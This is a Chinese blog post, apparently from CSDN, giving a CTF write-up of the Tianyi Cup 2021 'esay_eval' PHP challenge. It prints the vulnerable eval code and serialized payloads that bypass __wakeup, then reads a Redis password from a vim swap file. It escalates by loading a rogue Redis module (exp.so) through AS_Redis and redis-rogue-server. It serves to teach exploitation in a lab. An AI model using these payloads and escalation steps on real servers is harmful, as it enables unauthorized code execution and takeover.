[天翼杯 2021]esay_eval

最新推荐文章于 2024-08-19 23:40:47 发布
最新推荐文章于 2024-08-19 23:40:47 发布
阅读量676 收藏
点赞数 3
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/130628420
版权

[天翼杯 2021]esay_eval

<?php
class A{ #定义一个名为A的类
    public $code = "";  #定义一个公共属性code 
    function __call($method,$args){  #call魔术方法 当调用一个不存在的成员方法的时候触发
        eval($this->code);   #将code的值以php代码执行 
        
    }
    function __wakeup(){     # wakeup魔术方法反序列化时直接执行
        $this->code = "";    #     #将code的值设为空
    }
}

class B{            #定义一个名为B的类
    function __destruct(){      #destruct魔术方法当对象被销毁时自动调用
        echo $this->a->a();      #通过echo输出了a中a方法
    }
}
if(isset($_REQUEST['poc'])){  #接收poc
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);  #从poc中提取匹配BA和.*?的字符并存储到ret中
    if (isset($ret[1])) {  #判断ret[1]是不是存在
        foreach ($ret[1] as $i) { #把ret[1]中数组的值赋值给$i
            if(intval($i)!==1){   通过intval将$1改成整数 并怕判断是不是等于1
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

反推

    function __call($method,$args){
        eval($this->code);

call方法当调用一个不存在的方法时使用

 function __destruct(){
        echo $this->a->a();
    }

destruct中调用了不存在的a方法

而destruct的调用要在类销毁时调用

wakeup会给code赋值导致eval执行错误所以我们要绕过wakeup

那destruct的调用我们要先创建B类

new B -> destruct -> call
B            B        A
<?php
class A{
    public $code='phpinfo();'; 
}
class B{
    public $a;

}
$b = new B();
$b->a = new A();  
echo serialize($b);


?>

这里B中的a用来实例化A

这样$this->a->a() 就是 A类中的a()因为没有a()所以call会调用

这里因为匹配B A 类之后的数字判断是不是1 所以不能增加属性个数,我们可以在加真实属性的个数

还有这里匹配的是大写字母 类的名称大小都可以

O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}}
O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}s:1:"z":Z;}
O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}

这里过滤了system 所以不能直接读取

 

 

 发现其他目标没有权限 我们下在config.php.swp

vim -r config.php.swp

define("REDIS_PASS","you_cannot_guess_it");
define("DB_DATABASE" ,"test");
define("DB_PASSwOrd","");
define("DB_USERNAME","root");
define("DB_HOST" , "localhost");

 发现Redis密码,猜测是Redis提权

 用蚁剑连接Redis

http:// https://github.com/Medicean/AS_Redis

这里有教程

或者在蚁剑中找到插件商店

 

但是这个比较慢

 

 这样就好了

 

 

 

 然后使用redis利用脚本

https://github.com/Dliv3/redis-rogue-server 

 上传exp.so

 

MODULE LOAD 加载命令

这题无疑是一道很好的题,一步一步坐下来很有意思

许允er
关注
[天翼 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写&wakeup绕过)
oZuoShen123的博客
10-09 832
1、看代码,有unserialize函数,说明要反序列化 2、有 eval($this->code) ,说明要RCE 3、有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);,说明要绕过waf 4、A的wakeup里面会把code置空,所以要绕过 起点:B(destruct)  终点:A(call) 链条:B(destruct::a=$a)-> A(call::code=命令)
天翼easy_eval复现
weixin_44687621的博客
09-25 1519
最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。 本地环境的搭建 本地环境涉及到php的web服务、redis数据库。 Dockerfile的编写 FROM ubuntu:16.04 COPY src/sources.list /etc/apt/sources.list COPY src/redis-4.0.9 /home/redis-4.0.9 RUN apt-get update && \ apt-get install -y curl \
[天翼 2021]esay_eval-----记Redis提权
qq_73767109的博客
06-25 203
一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。Vim缓存泄露指的是当用户在Vim编辑器中打开了一个文件,并进行了修改,然后使用了Vim或其他工具关闭了该文件,但Vim缓存中仍然保留着该文件的副本,从而导致该文件中的敏感信息(例如密码、私密密钥等)泄露的漏洞。
[天翼 2021]esay_eval复现
最新发布
google20的博客
08-19 258
php反序列化,redis
ESAY_RE之没有main函数怎么办
gonna2011的博客
03-18 232
解题过程直接看大佬的https://blog.csdn.net/njh18790816639/article/details/112291179?spm=1001.2014.3001.5501 但是遇到这种没有主函数的题该怎么快速筛选出主要函数???和之前的Mysterious(攻防世界进阶区第一题)差不多,我遇到这种情况一般都是一个一个往下找的,但是这个题我get到一个奇怪的方法,先打开一下这个可执行文件是下面这个样子的:显示了input,说明input必在主函数中 两键shift+F12,找到主要内容
UR3机械臂使用kinect2相机利用easy_hand手眼标定
SpengTAN的博客
05-15 2980
1.下载easy_handeye(标定的工具包) https://github.com/IFL-CAMP/easy_handeye 2.下载vision_visp(标定过程调用) https://github.com/lagadic/vision_visp 下载aruco_ros(标定过程调用) https://github.com/pal-robotics/aruco_ros 进入/cat...
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7667
攻防世界 -- very_easy_sql
2021 天翼easy_eval
m0_56059226的博客
10-04 2366
打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt
[天翼 2021]esay_eval(复现)
qq_53460654的博客
12-17 3083
<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a();
『CTF Web复现』[2021 天翼]easy_eval
Ho1aAs‘s Blog
09-23 1190
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
esay excel
09-02
EasyExcel是一个基于Java的开源项目,用于简化读写Excel的操作。它在尽可能节约内存的情况下,支持读写百M级别的Excel文件。相比于其他的Java处理Excel的框架,如Apache POI和jxl,EasyExcel具有更低的内存消耗。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值